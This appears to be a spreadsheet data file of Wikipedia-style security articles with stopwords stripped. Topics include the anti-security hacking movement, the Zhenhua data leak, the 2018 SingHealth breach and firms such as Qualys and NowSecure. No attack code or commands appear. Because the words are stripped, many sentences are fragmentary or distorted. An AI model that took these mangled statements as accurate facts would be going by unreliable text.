much greater extent exploits kept private, published. common misconception groups individuals keep exploits security secrets themselves, become dominators "illegal scene", countless insecure systems solely mercy. this truth. forums information trade, bugtraq, packetstorm, www.hack.co.za, vuln-dev done much harm underground done help them. what casual browsers sites mailing lists fail realize prominent groups publish findings immediately, last resort case code leaked become obsolete. this production dates header files often precede release dates matter months even years. another false conclusion manner groups released anything matter months, must found anything new. regular reader must made aware things. trying discourage exploit development source auditing. merely trying stop results efforts seeing light. please join would like stop commercialization, media, general abuse infosec. thank you. ~el8 ~el8 first anti-security hacktivist groups. group waged security industry popular assault known "pr0j3kt m4yh3m". pr0j3kt m4yh3m announced second issue ~el8. idea project eliminate public outlets security news exploits. some ~el8's notable targets included theo raadt, mixter, ryan russel (blue boar), gotfault (also known insanity), chris mcnab (so1o), jobe, rloxley, aempirei, broncbuster, lcamtuf, openbsd's repository. group published four electronic zines available textfiles.com. acronym "phrack high council". this group also waged security industry continued update website news, missions, hack logs. less recent history most original groups ~el8 grown tired anti-security movement left scene. groups started emerge. dikline dikline kept website index websites people attacked group submitted them. some notable dikline targets rave, rosiello, unl0ck, nocturnal, r0t0r, silent, gotfault, skew/tal0n. more recent history giest august 2008, mails sent full-disclosure mailing list person/group known "giest". other targets include mwcollect.org group released tar.gz containing listens honeypot networks. (zer0 owned) performed numerous attacks name pr0j3kt m4yh3m 2009. they took targets critical security, comodo various others. they published ezines total. july 2009, kevin mitnick's website targeted zf0, displaying pornography text "all board mantrain." antisec group group known "antisec group" enters scene attacking groups/communities astalavista, security auditing company named ssanz popular image hosting website imageshack.graffiti reading "antisec" began appearing diego, california june 2011 incorrectly associated original antisec movement. according cbs8, local affiliate "people living mission beach unusual graffiti first appeared last week boardwalk." they also reported "...it quickly painted over, stenciled words back monday morning." later realized related anti-sec movement started lulzsec anonymous.on april 2015 antisec movement reappeared started doxing police officers hacking databases. april 2015 hacked madison police department released officers names, address, phone numbers, personal data relation anonymous operation. references</t>
  </si>
  <si>
    <t>Peter Zandan</t>
  </si>
  <si>
    <t>peter zandan (born 1953) american entrepreneur expert field data science analytics. zandan data advisor, board member, executive advisor numerous for-profit not-for-profit organizations. zandan executive chairman quantified communications, advanced analytics communications software company. zandan served global vice chairman hill+knowlton strategies 2011 2021. founder intelliquest information group inc., austin-based global research firm, served chairman ceo, taking company public 1996. through intelliquest, zandan pioneered electronic surveys internet field market research. zandan founded served zilliant, pioneered artificial intelligence machine learning pricing optimization. 1998, developed sponsored intelliquest poll became zandan poll, survey among austin residents covers variety topics including economy, affordability, growth, education, policy issues overall cultural identity austin. zandan currently member president's circle national academies sciences, engineering, medicine. zandan served board klru, public television station austin, texas, currently member advisory council mccombs school business university texas austin. having moved austin 1970s, zandan earned ph.d. evaluation research university texas austin. early life education born longmeadow, massachusetts, zandan received bachelor arts degree history university massachusetts amherst 1975. latter half 1970s, zandan moved mexico pursue international studies. after several years abroad, returned united states earned evaluation research 1983 university texas austin. career intelliquest zandan founded first major company 1984 name intelliquest, subsequently served company's chairman 1999. intelliquest focused changing companies performed market research pioneering ‘disk-by-mail’ methodologies, later utilizing internet based electronic surveys. intelliquest fastest growing market research company worldwide 1990s provided product, marketing, branding services corporations apple, ibm, mckinsey co., microsoft, hewlett-packard. company provided marketing information technology companies direct marketing services internet marketers. additionally supplied information tech markets subscription proprietary project basis. during period, intelliquest grew employees offices austin, silicon valley, york city, london. under zandan’s leadership, intelliquest included twice inc. magazine’s list fastest-growing private companies united states. zandan took company public 1996 nasdaq exchange, acquired 1999. zilliant 1998, peter zandan founded served chairman zilliant inc, another austin-based corporation. through zilliant, zandan pioneered application machine learning predictive analytics. zilliant developed leader strategic pricing management, providing software solutions enable corporations outline manage e-commerce pricing. zandan helped develop company's flagship product, called zilliant intelligent pricing solution (zips), tested real-time customer pricing behavior monitored activity market opportunities. zips based zandan's assertion “the internet allows companies better understand customers [and] preferences,” offering business-to-business predictive pricing sales applications, zilliant grew quickly. zilliant also develops artificial intelligence-driven sales pricing solutions companies. 2011, zilliant named venture-backed companies wall street journal's “the next thing” list. zilliant received funding goldman sachs, addition high-profile investments.in december 2021, zilliant successful sale madison dearborn partners. hill+knowlton strategies from 2011 2021,peter zandan served global vice chairman hill+knowlton strategies, company employing 3000 people across countries. chairman, developed firm's reputation management communications research offerings. hill+knowlton zandan provided assistance international brand development clients financial services, energy, technology, healthcare retail industries. quantified communications zandanis co-founder, executive chairman chief data scientist quantified communications, austin-based software company pioneered artificial intelligence machine learning assess, develop improve individual communication skills. national academy sciences june 2013, zandan selected member president's circle national academy sciences., engages leaders various scientific disciplines engineering medicine effort provide intellectual financial resources. president's circle honorary association membership acquired invitations presidents three academies. addition position president’s circle, peter also advisory committee nas’ division behavioral social sciences education. through work member committee america’s climate choices, peter played critical role producing america’s climate choices, series studies requested united states congress inform environmental policy decisions. zandan member albert einstein society within national academy sciences. other ventures along honored 1998 lifetime member mccombs business school's advisory council, zandan served board public television station klru, meow wolf, arts media organization based santa mexico, expanded denver vegas. zandan professor entrepreneurial marketing university texas' graduate school business. community involvement peter zandan impacted austin community social analytics work external involvement. 2014, introduced zandan poll, poll surveys austin-area residents assess attitudes community, economy, health, transportation city. longtime citizen austin, zandan watched community grow years wanted create objective tool measure austinites felt community evolving. zandan provides gift austin community. with help klru, poll expanded areas “cultural identity” affordability order increase understanding dialogue community issues. zandan also received austin's “soul city” business award contributions community founder co-chair austin summit, one-day issues conference austin's high-tech executives. additionally, former chair continues serve austin city limits committee member board directors klru-tv. awards recognitions growing intelliquest fastest-growing market research firms 1990s, peter zandan received austin's ernst young's entrepreneur year award high technology electronics. award represents elite corp women recognized exceptional entrepreneurial achievements. community involvement austin area, peter zandan also awarded “best visionary” award austin chronicle, weekly publication austin, texas. zandan also received “hero democracy” award austin american-statesman, recognized interactive week “unsung heroes internet.” references external links zandanpoll.com zilliant.com</t>
  </si>
  <si>
    <t>Asset (computer security)</t>
  </si>
  <si>
    <t>information security, computer security network security, asset data, device, component environment supports information-related activities. assets generally include hardware (e.g. servers switches), software (e.g. mission critical applications support systems) confidential information. assets protected illicit access, use, disclosure, alteration, destruction, and/or theft, resulting loss organization. triad goal information security ensure confidentiality, integrity availability (cia) assets various threats. example, hacker might attack system order steal credit card numbers exploiting vulnerability. information security experts must assess likely impact attack employ appropriate countermeasures. case might firewall encrypt credit card numbers. risk analysis when performing risk assessment, important weigh much spend protecting asset cost losing asset. also important take account chance loss occurring. intangible costs must also factored hacker makes copy company's credit card numbers cost anything directly loss fines reputation enormous. also countermeasure (computer) factor analysis information risk information security management risk risk factor risk management references external links fismapedia term</t>
  </si>
  <si>
    <t>Windows Identity Foundation</t>
  </si>
  <si>
    <t>windows identity foundation (wif) microsoft software framework building identity-aware applications. provides apis building asp.net based security token services well tools building claims-aware federation capable applications.windows identity foundation supported 6/windows server 2003, 7/windows vista, windows server 2008 windows version shipped standalone product, product included part microsoft .net framework v4.5. major features following major features: allows developers build claims-aware applications providing application programming interfaces (apis) help developers write code make access decisions applications based claims. provides templates help developers started building claims-aware applications. provides utilities facilitate creation trust relationship claims-aware application (sometimes referred relying party application, rp), security token service (sts). provides asp.net controls help developers create pages claims-aware applications. includes utility helps developers translate claims tokens, claims-aware applications used access resources require nt-token based identity. includes functionality allows identities maintained across multiple service boundaries, allows delegation claims. provides tools help developers build custom security token services using asp.net wcf. also claims based identity security token service references external links "official name geneva" "windows identity foundation site"</t>
  </si>
  <si>
    <t>Atdmt</t>
  </si>
  <si>
    <t>atdmt tracking cookie served facebook subsidiary atlas solutions used third-party cookie several websites. cookie originates domain atdmt.com owned atlas. references</t>
  </si>
  <si>
    <t>Petname</t>
  </si>
  <si>
    <t>petname systems naming systems claim possess three naming properties zooko's triangle global, secure, memorable. software uses system satisfy three requirements. such systems used enhance security, preventing phishing attacks. unlike traditional identity systems focus service provider, petname systems decentralized designed facilitate needs enduser interact multiple services. history though petname model formally described 2005 mark stiegler, potential system discovered several people successively. examples name system (gns) decentralized alternative based principle petname system capdesk distributed desktop environment petname tool (discontinued browser extension) there browser extension available firefox called petname tool allowed names assigned secure websites. extension could help prevent phishing attacks. petname markup language petname markup language (pnml) proposal embedding petname information systems using custom markup language.pnml consists tags: &lt;pn&gt;pet-name-string&lt;/pn&gt; &lt;key&gt;stringified-cryptographic-key&lt;/key&gt; references external links petname site introduction petname systems petname markup language petnames: humane approach secure, decentralized naming</t>
  </si>
  <si>
    <t>Associated Whistleblowing Press</t>
  </si>
  <si>
    <t>associated whistleblowing press (awp) not-for-profit information agency based brussels, belgium, dedicated defense human rights promoting transparency, freedom information speech, whistleblowing investigative journalism, conceived global network made cooperative local platforms actors. according website, initiative aims work decentralized network structure, local platforms deal local information, contexts actors "from roots upward model". stories produced published project's multilanguage newsroom creative commons license. team consists collaborators spread around world, editors, pedro noel santiago carrion. decentralized platforms strategy amplify social effect denouncing crimes corruption, associated whistleblowing press building whistleblowing platforms oriented different communities well precise issues problematic subjects, establishing networks local international media civil society organizations. platforms created precise contexts intended achieve specific goals transparency, publishing restricted censored material political, scientific, ethical, diplomatic historical significance. rumor, opinion, stories kinds first hand accounts material publicly available elsewhere accepted. materials violate individual privacy accepted unless speak violations abuses affect public sphere. ljost september 2012, launched ljost, first local whistleblowing platform reykjavík, iceland. internet pioneer guðmundur ragnar guðmundsson, birgitta jónsdóttir, member parliament althing, icelandic parliament, representing pirate party iceland investigative journalist bjarki collaborated creation platform. ljost.is website allows icelandic citizens send information proving abuse corruption safe anonymous way. platform network journalists, researchers media agencies dedicated analyzing publishing leaked content make governments corporations accountable actions bringing light. according associated whistleblowing press, main objective moving ljost platform restore media active player truth justice iceland, believing transparency best increase social accountability local governments corporations actions. members believe journalists, researchers media activists, powerful lead people take action repression, abuse power, censorship, social inequality corporate greed icelandic society. december 2013, ljost published glitnir files, leak brings public account detailed information identifying glitnir bank's biggest borrowers stakeholders well relevant track shares movements 2007/2008 evidence handful individuals companies strong connections glitnir's central shareholders borrowed large amounts cash bank, often insufficient underlying collateral. filtrala april 2014, launched filtrala archived 2014-04-29 wayback machine, first local whistleblowing platform spain. name project literally means “leak it”. launched collaboration four spanish media organizations marea, eldiario.es, diagonal, mongolia catalan media organizations crític, directa along comisión anticorrupcíon ciudadana partido created serve spanish society anyone send safe anonymous information denounces crimes, corruption, abuse infraction individuals, corporations institutions. part international network settled belgium recognition ensuring press freedom, informant protection journalism protection. main objective amplify revealed information mediatic, civil legal level. through platform spanish society citizen mechanism fight corruption abuse social regeneration based mainly social justice. submission system uses globaleaks software manage on-line submissions sensitive materials obligates users anonymity system 'tor hidden service only' platform. (furthermore, member torservers.net, network nonprofits specializes general establishment exit nodes workshops donations.) each node charge managing virtual dropbox, analyzing information received, transforming news stories coordinating within local international network media organizations publication. data management policies analysis submissions consists main steps. first thorough investigation done normally large files variable formats (such emails internal memos) order locate relevant information. this information later context, explaining actors, motives consequences relation organizations people question. when publishing results news, work closely many trustworthy media partners activists order reach largest audience possible. dissemination process also amplified thanks internet social media. also whistleblowing globaleaks (anonymity network) pedro noel birgitta jónsdóttir external links official website references</t>
  </si>
  <si>
    <t>Zhenhua Data leak</t>
  </si>
  <si>
    <t>shenzhen zhenhua data information technology data scraping company provides open-source intelligence profiling threat intelligence services. company reported owned china zhenhua electronics group, owned china electronics corporation (cec), state-owned military research enterprise. while data zhenhua uses publicly available data, zhenhua's usage data security concern western countries. company claims work chinese government, including chinese intelligence agencies military. zhenhua data's publicly supported "hybrid warfare" "psychological warfare". winston peters, foreign affairs minister zealand, stated would 'naive' think connection chinese state.in september 2020, data leak revealed zhenhua globally monitoring million people. databases, collectively called overseas information database (okidb), leaked american academic shared data internet 2.0, australian-based cybersecurity consultancy. september 2020, consortium media outlets published findings. researchers found data open source locations. investigation journalists zealand found people online presence profiled database.there "conflicting assessments" value data, entirely "aspirational" venture, small peek world hybrid warfare psychological warfare waged chinese.internet recovered quarter million people okidb, including 52,000 americans, 35,000 australians 10,000 britons. prominent people database include prime ministers boris johnson scott morrison, president austria alexander bellen families. hungarian prime minister viktor orbán's children appears list well. australians database include natalie imbruglia, larry anthony, emma husar, ellen whinnett junaid thorne. around 10,000 people organisations india also list, including senior india diplomats harsh vardhan shringla sanjeev singla, policymakers amitabh kant, academics romila thapar, sportspeople sachin tendulkar. numerous indian think-tanks also monitored.a threat intelligence organisation published report zhenhua data's operation found number monitoring systems publicly accessible. report found real-time monitoring social media linkedin, tiktok, facebook, twitter online forums, discovered "internet data military intelligence system". this system tracks warships real-time profiles personnel board, weapons carried, linkedin profiles etc. this related previous story published titled "how china uses linkedin recruit spies abroad". firm also found keywords used target embassy-supported activists hong kong, included political organisations, famous events protestors. also global surveillance disclosures (2013–present) references</t>
  </si>
  <si>
    <t>NowSecure</t>
  </si>
  <si>
    <t>nowsecure (formerly viaforensics) chicago-based mobile security company publishes mobile device security software. 2009: beginnings former co-founder andrew hoog working employees dismissed. after dismissal, hoog tasked reviewing whether employee stolen sensitive data company. rather hire forensics firm investigate, hoog performed investigation continued forensic work side. 2009-2014: from forensics security hoog wife chee-young contributed money start company, originally known chicago electronic discovery viaforensics. hoog devoted full-time mobile forensics, continued work corporate participated business development night weekends. march 2011, viaforensics profitable extent could employee benefits, left went work viaforensics full-time. june year, viaextract released conference myrtle beach. viaforensics introduced known vialab march 2013. vialab product allowed automated testing variety security flaws apps, including man-in-the-middle attacks, strip attacks, coding problems, opportunities reverse engineering. viaforensics subject 5000's "#13 fastest-growing tech company award 2014. 2014-present: rebrand nowsecure 2014, viaforensics launched viaprotect, show users destinations sources data mobile devices, conference. company began focus similar individual enterprise device protection. result focus shift, viaforensics decided rebrand nowsecure. products nowsecure publisher nowsecure forensics (formerly viaextract), nowsecure (formerly vialab), nowsecure mobile apps (formerly viaprotect). nowsecure forensics designed enforcement extract artifacts mobile devices applying deleted data recovery data search. nowsecure mobile vulnerability scanning software. nowsecure mobile free end-user oriented vulnerability scanner ios, android, blackphone. 2014 2015, magazine awarded viaprotect "editor's choice android privacy utilities". also mobile security references external links official website</t>
  </si>
  <si>
    <t>Wireless Public Key Infrastructure</t>
  </si>
  <si>
    <t>wireless public infrastructure (wpki) technology provides public infrastructure functionality using mobile secure element card. used example two-factor authentication. references</t>
  </si>
  <si>
    <t>Click analytics</t>
  </si>
  <si>
    <t>click analytics special type analytics gives attention clicks (point-and-click) constitute first stage conversion funnel. commonly, click analytics focuses on-site analytics. editor site uses click analytics determine performance particular site, regards users site clicking. information click analytics happen real-time "unreal"-time, depending type information sought. typically, front-page editors high-traffic news media sites want monitor pages real-time, optimize content. editors, designers stakeholders analyze clicks wider time frame assessing performance written passages, design elements advertisements etc. click data gathered least ways. ideally, click "logged" occurs, method requires functionality picks relevant information event occurs. alternatively, institute assumption page view result click, therefore simulated click leads page view. also click tracking call action (marketing) list analytics software references clicky: real time analytics estimated website cost domain click tracking your website: need know</t>
  </si>
  <si>
    <t>AssureSign</t>
  </si>
  <si>
    <t>assuresign electronic signature software deployed software service (saas) application installed customer premises. documents signed using computer internet connection. assuresign electronic signature technology uses patent-pending biometric, handwritten, mouse-based signatures.assuresign's tools enable users integrate existing environments. assuresign maintains partner program. assuresign also integrated third party applications.assuresign electronic signature technology developed 2006 offering third party verification, inc. (3pv). assuresign formed separate company 2008 david brinkman dale combs. assuresign consistently ranked orlando sentinel's companies working families.in july 2021, assuresign purchased nintex called nintex assuresign. this purchase enables software linked popular nintex workflow cloud product. https://www.nintex.com/blog/nintex-acquires-esignature-leader-assuresign/ references</t>
  </si>
  <si>
    <t>Principal (computer security)</t>
  </si>
  <si>
    <t>principal computer security entity authenticated computer system network. referred security principal java microsoft literature.principals individual people, computers, services, computational entities processes threads, group things. they need identified authenticated assigned rights privileges resources network. principal typically associated identifier (such security identifier) allows referenced identification assignment properties permissions. references external links 2744 generic security service version 5397 webdav current principal extension. 4121 kerberos version generic security service application program interface (gss-api) mechanism: version</t>
  </si>
  <si>
    <t>Astalavista.box.sk</t>
  </si>
  <si>
    <t>astalavista.box.sk founded 1996 first search engines computer security information. practice turned used search engine security exploits, software hacking, cracking different keygenerators software cracks. site also known referencing things spyware viruses website known possibly contain data, links, downloadable files, information users would consider spyware, adware, unwanted programs. astalavista.box.sk hosted slovakia. astalavista spanish phrase "hasta vista" (meaning "see later") 90's search engine altavista. (doub: note altavista 1995 astalavista 1994). astalavista also used refer computer security related websites like astalavista security group. references external links official website</t>
  </si>
  <si>
    <t>2018 SingHealth data breach</t>
  </si>
  <si>
    <t>2018 singhealth data breach data breach incident initiated unidentified state actors, happened june july 2018. during period, personal particulars million singhealth patients records outpatient dispensed medicines belonging 160,000 patients stolen. names, national registration identity card (nric) numbers, addresses, dates birth, race, gender patients visited specialist outpatient clinics polyclinics 2015 july 2018 maliciously accessed copied. information relating patient diagnosis, test results doctors' notes unaffected. information prime minister hsien loong specifically targeted. discovery database administrators integrated health information systems (ihis), public healthcare provider, detected unusual activity singhealth's databases july, implemented precautions intrusions. network traffic monitoring enhanced; additional malicious activity detected july, result theft data. having ascertained cyberattack occurred, administrators notified ministries brought cyber security agency (csa) july carry forensic investigations. agency determined perpetrators gained privileged access network compromising front-end workstation, obtained login credentials assess database, hiding digital footprints. attack made public statement released ministry communications information ministry health july. ten-day delay discovery attack public announcement attributed time needed fortify systems, conduct preliminary investigations, identify affected patients prepare logistics announcement. text messages subsequently sent patients whose data affected. investigation august 2018 parliament, iswaran, minister communications information, attributed attack sophisticated state-linked actors wrote customized malware circumvent singhealth's antivirus security tools. iswaran name state interest national security.a committee inquiry convened july 2018 investigate causes attack identify measures help prevent similar attacks. four-member committee chaired former chief district judge richard magnus, comprise leaders cyber-security firm, healthcare technology firm national trades union congress respectively. committee called attorney-general's chambers lead evidence, attorney-general's chambers appointed cyber security agency lead investigations support criminal investigation department. committee held closed-door public hearings august, another tranche hearings september october. addition, personal data protection commission investigated possible breaches personal data protection protecting data hence determine possible action. committee inquiry hearings committee inquiry hearings began september 2018. first hearing, solicitor-general kwek mean luck said series staff missteps gaps system contributed breach. some examples mentioned system, place since 1999. addition, mentioned cyberattacker behind incident started infecting workstations early august 2017 using hacking tool. version microsoft outlook used patch prevents attacks hacking tool. between december 2017 2018, cyberattacker moved sideways gained access workstation infect computers malware. other inadequacies identified include able identify multiple failed attempts system, done non-existent accounts accounts much privileges system. eventually, cyberattacker successfully gained entry coding vulnerability june, hence sent queries july stopped administrator. addition, three periods staff failed respond responded days knowledge cyberattack first known. day, staff members said framework place report cyberattacks, insufficient training hence unclear staff actions taken.at next hearing september, revealed prime minister hsien loong's personal data outpatient records along unnamed people searched hackers infiltrated servers using nric numbers. rest queries generally done patient demographic data, like involved first 20,000 records data singapore general hospital. assistant lead analyst detected unusual activity investigated even scope, sent alerts different divisions find staff make sense queries. analyst's supervisor told analyst continue monitoring situation assumed medical data informed leak. analyst informed reporting officer, point reporting query himself, asking analyst follow queries. details reporting procedures containment measures mentioned.on third day, cybersecurity employee integrated health information systems (ihis), holiday incident happened, follow read emails thought collection data workstations investigation. addition, computer ihis used carry forensic examinations, resulting delays diagnosing issue. this confirmed fourth trial, failings judgement organisational processes exposed. instance, meetings security management department conducted regularly, framework created appropriate responses cybersecurity risks appoint covering officers staff leave. clarification processes provided, standard operating procedure escalate incidents approved management march 2018. also revealed staffers took days july confirm data breach ihis employee mistakenly informed colleagues data stolen, confirmed tests superior finding data stolen. queries later recreated.it also revealed fifth server exploited hackers receive security updates year since 2017 wannacry ransomware attacks, compared normal duration patches done several times month. besides that, computer's anti-virus software must reinstalled. manager supposed manage server paper, practice, given role 2014 server located national cancer centre singapore, thereby convenient staff members approach case help needed. once counterparts resigned, ihis present take managing server. fact, ihis director aware server managed firm practice, giving directive 2014 ihis manage research servers. next day, security loophole plugged scruntised. even though loophole flagged ihis employee, action taken. fact, employee dismissed sending details flaw rival company.towards second tranche hearings october 2018, revealed second attempt hack servers done july another server attackers skilled. this stopped immediately soon began. addition, malware used customised system evaded detection anti-virus software. tool called powershell used process, disabled july. meanwhile, ihis stepped security changing passwords, removing compromised accounts rebooting servers.the third tranche hearings started october 2018. evidence shown managers reluctant report incidents would mean increased amount work, thereby creating bottleneck. meanwhile, chief information officer told team escalate incident, saying bottleneck acceptable, adding written protocol report singhealth-related cybersecurity incidents ihis staff discover incident. another pointed annual cybersecurity exercises mandated critical information infrastructure (cii) operators, staff able identify advanced persistent threats (apts). however, tests classroom settings necessarily apply singhealth case, thus defeating purpose exercises situational awareness there. there also plans secure internet browsing healthcare sector 2018, delayed year technical issues.the following day, 2016 audit found systemic weaknesses network link singapore general hospital cloud-based systems brought showing inadequacies systems managed ihis. incident reported operations team "plugged" management without anyone verifying works vulnerabilities done. cyber security agency also found similar vulnerabilities investigation. this, "three lines defence", compliance checks performed operations team, technology team internal audit team, training stepped ihis early detection attacks ensured. pointed next even weaknesses found, fixed quickly expected public healthcare institutions operate around clock resulting little downtime.later hearings, singhealth executives said enhance cyber safety awareness employees, well roll systems capture patients' data rigorously. also allow patients update particulars instead counter. more townhalls held update employees latest cyber threats, log-in messages strengthened hone importance data protection. storytelling formats also used explain concepts. more cyber security exercises simulating data breaches called subsequent hearing, allowing professionals familiar case similar incident happens again. addition, expert recommended data within system encrypted including inactive data. full encryption would unfeasible operational concerns, personal data could anonymised instead 2-factor authentication de-anonymise that hearing, updated many written submissions found useful.towards final hearings, former national security agency director suggested government industry partners work together share information learn update threats that current protection measures insufficient ever evolving vulnerabilities. hearing, ministry health's chief data advisor pointed internet separation resulted longer wait times patients, declined productivity, increased staff fatigue cyber risks, especially anti-virus software updates done computers instead within network. hence, continue iss, factors would need considered. next day, security expert recommended centralised incident management tracking system logs incidents occur breach reduce miscommunication, causes delayed reporting. addition, usage different chat platforms meant crucial details attack lost hence many linkages incident.on final day, cyber security agency chief david suggested changing staff healthcare sector report incidents faster response ensured cyberattack, along review sector's processes staff training carried out. also suggested cybersecurity processes considered instead merely existing afterthought. hearings thus concluded november 2018.the closing submissions held november 2018. proposals improve cybersecurity shared, including "assume breach" mindset organisations thus taking necessary measures, right people processes complement measures. also pointed administrator passwords supposed characters long, problematic password eight characters unchanged since 2012. lastly, even measures place slow cyberattacks, important note attack done advanced persistent threat (apt). subsequently, report submitted iswaran december 2018 public version released january 2019. release report january 2019, committee inquiry released report singhealth breach. report found staff inadequately trained cybersecurity, thus unable stop attacks. staff take immediate action stop attacks fearing pressure. make things worse, vulnerabilities network systems patched quickly, coupled fact attackers well-skilled. result, attackers found easy break report point staff adequately trained vulnerabilities fixed quickly, attack could averted. report also found work advanced persistent threat group.in report, committee inquiry made recommendations boost cybersecurity, separated priority additional recommendations. they are: priority: adopting enhanced security structure readiness ihis public health institutions review online security processes assess ability defend respond cyberattacks improving staff awareness cyberattacks perform enhanced security checks, especially critical information infrastructure (cii) systems subject privileged administrator accounts tighter control greater monitoring improve incident response processes forge partnerships industries government achieve higher cybersecurity additional: security risk assessments audits must treated seriously carried regularly enhanced safeguards must place protect confidentiality electronic medical records improve domain security attacks implement robust patch management process implement software upgrade policy focus cybersecurity implement internet access strategy limits exposure external threats clearer guidelines respond cybersecurity incidents improve competence computer security incident response personnel consider post-breach independent forensic review networkon january 2019, iswaran, minister communications information announced parliament government accepted recommendations report fully adopt them. also sped implementation cybersecurity increase security ciis. separately, yong, minister health announced changes enhance governance operations singapore's healthcare institutions ihis made. dual role ministry health's chief information security officer (moh ciso) director cybersecurity governance ihis separated, ciso dedicated office reports permanent secretary moh, ihis separate director charge cybersecurity governance, changes cluster level. this help boost operations governance systems. addition, establish enhanced "three lines defence" system public healthcare, pilot "virtual browser" national university health system. public healthcare staff remain internet surfing separation, implemented immediately cyberattack, mandatory contribution patient medical data national electronic health record (nehr) system continue deferred. aftermath following cyberattack, internet access temporarily removed public healthcare terminals access healthcare network, additional system monitoring controls implemented.the attack two-week pause singapore's smart nation initiatives review public sector's cyber-security policies time. review resulted implementation additional security measures, urged public sector administrators remove internet access possible secure information exchange gateways otherwise. attack also renewed concerns among healthcare practitioners regarding ongoing efforts centralize electronic patient data singapore. plans pass laws late 2018 making compulsory healthcare providers submit data regarding patient visits diagnoses national electronic health record system postponed. addition, ministry health announced august 2018 national electrical health record (nehr) reviewed independent group made cyber security agency pricewaterhousecoopers asking doctors submit records nehr, even though affected cyberattack.on july 2018, monetary authority singapore told banks singapore tighten customer verification processes case leaked data used impersonate customers, additional information requested. banks also told conduct risk assessments mitigate risks misuse information.the integrated health information systems (ihis) since strengthened public health systems data breaches. suspicious incidents reported within hours. measures also place, including two-factor authentication administrators, proactive threat hunting intelligence, allowing computers latest security updates hospital networks, database activity monitoring. studies done keep internet separation scheme (iss) permanent parts healthcare system virtual browser piloted alternative.after report released, january 2019, integrated health information systems (ihis) dismissed employees demoted negligent handling misunderstanding attack respectively, financial penalties imposed middle management supervisors, five members senior management including bruce liang. three employees commended ihis handling incident diligently even part scope. ihis since fast-tracked suite measures enhancing cybersecurity. next day, personal data protection commission fined ihis $750,000 singhealth $250,000 enough safeguard personal data personal data protection act, making largest fine imposed data breaches.subsequently, march 2019, cybersecurity company symantec identified state-sponsored group, known whitefly, behind cyberattack. although country identified, group found behind several related cyberattacks singapore-based entities since 2017. references</t>
  </si>
  <si>
    <t>Ziften</t>
  </si>
  <si>
    <t>ziften cybersecurity software company based austin, texas, united states. organization's endpoint protection platform designed provide advanced anti-virus, endpoint detection response, endpoint visibility hardening enterprise laptops, desktops, servers cloud. 2020, ziften business. history ziften founded 2009 mark obrecht previously founded wholesecurity, behavior-based security anti-phishing company sold symantec 2005.in 2012, ziften raised $5.5 million capital series round fayez sarofim july 2015, ziften raised million capital york-based spring mountain capital fayez sarofim april 2017, ziften raised additional $14.7m trousdale ventures. organization's total funding date $50m. mike hamilton, previously ziften's chief product officer, appointed june 2018. product services september 2017, ziften announced series managed security services, called managed assess service, managed hunt service, managed respond service, designed help organizations augment security teams getting additional help monitoring edr, analytics, security forensics.in november 2017, microsoft announced partnerships windows defender advanced threat protection (atp) service, including integration ziften's zenith security platform macos linux operating system support. integration provides security events onboarded macos linux devices surfaces within windows defender console. ziften later included member initial formation microsoft intelligent security association.in august 2018, ziften enhanced zenith endpoint protection platform advanced anti-virus capabilities. capabilities help block file-based, file-less, in-memory attacks. zenith uses artificial intelligence (ai) cloud help protect enterprises. references external links ziften's website</t>
  </si>
  <si>
    <t>Qualys</t>
  </si>
  <si>
    <t>qualys, inc. provides cloud security, compliance related services based foster city, california. qualys provides vulnerability management solutions using "software service" (saas) model. added cloud-based compliance application security offerings. qualys 10,300 customers countries, including majority forbes global 100. company strategic partnerships major managed services providers consulting organizations including dell secureworks, fujitsu, ibm, ntt, symantec, verizon, wipro. company also founding member cloud security alliance (csa). history qualys founded 1999. company launched qualysguard december 2000, making qualys first entrants vulnerability management market. march 2001, angel investor philippe courtot became company major investment company. also served chairman board. philippe originally invested qualys 1999 company founded, became march 2001. philippe brought vision company unique start build cloud delivery platform would allow scanning network globally. creating qualysguard intranet scanner released 2002 automatically scan corporate lans vulnerabilities search available patch. following year, qualys released freemap, web-based tool scanning, mapping identifying possible security holes within networks connected internet.in 2005, qualys extended qualysguard product line. 2008, qualys introduced qualysguard policy compliance, extended platform's global scanning capabilities collect compliance data across organization information policies document compliance auditing purposes. qualys also released service application scanning named qualysguard application scanning (was). 2010, conference usa, qualys announced qualysguard malware detection service, service designed scan identify malware sites. also announced qualys secure seal, allows websites show visitors passed security scans.in july 2010, qualys announced qualys browsercheck, service checking browsers plug-ins security vulnerabilities. conference 2011, qualys launched open source application firewall project, ironbee, ivan ristic, creator modsecurity director engineering qualys. conference 2012, qualys introduced updates qualysguard cloud platform, extended capabilities help customers improve security systems applications, automate compliance initiatives it-grc, provide online protection cyber-attacks reducing operational costs increasing efficiency security programs.qualys went public nasdaq symbol qlys september 2012, raising proceeds $87.5 million. 2014 conference, qualys announced general availability qualyguard application firewall (waf), provides protection websites running amazon on-premises, well continuous monitoring solution free security controls service. 2015, company released software included virtual patching customizable event responses. that year, qualys also released security compliance solution called cloud agent platform. august 2015, company released free asset management service, qualys assetview, allowed organizations keep inventory computers software.in february 2016, qualys released threatprotect, vulnerability detection service cloud-based platform. company received full certification configuration management databases (cmdbs) servicenow, allowing integrated servicenow's system march 2016. july 2016, announced qualys would integrate microsoft azure security center. august 2017, qualys acquired network analysis assets nevis networks undisclosed sum. december 2017, qualys announced acquisition netwatcher, network security company.in april 2018, qualys acquired software assets singapore-based 1mobility, startup develops security technologies mobile phones.in june 2018, qualys announced addition asset inventory cloud platform. awards qualys pwnie awards 2021, categories “best privilege escalation bug” “most under-hyped research”.qualys honored media winner best vulnerability management solution 2020 trust awards.qualys received 2019 gartner peer insights customers' choice award vulnerability assessment.in 2017 frost sullivan recognized qualys 2017 global vulnerability management market leadership award.throughout history qualys received number awards. references external links official website business data qualys: qualys labs vulnerability scanner hoge, patrick (december 2008). "friday, december 2008 network security firm qualys floats cloud computing redwood city company $50m". francisco business times. retrieved january 2010. hines, matt (october 2007). "core, qualys enter apps scanning market". infoworld. retrieved january 2010. rash, wayne (december 2002). "inside information qualysguard service strengthened intranet scanner appliance.(qualisguard intranet scanner applicance [sic?])(hardware review) (product/service evaluation)". infoworld. retrieved january 2010. "qualys updates network security auditing security audits automated unalterable, describing audit performed, vulnerabilities uncovered, them, assigned whom, repairs successfully implemented". internet week. april 2003. retrieved january 2010.</t>
  </si>
  <si>
    <t>Anti-pharming</t>
  </si>
  <si>
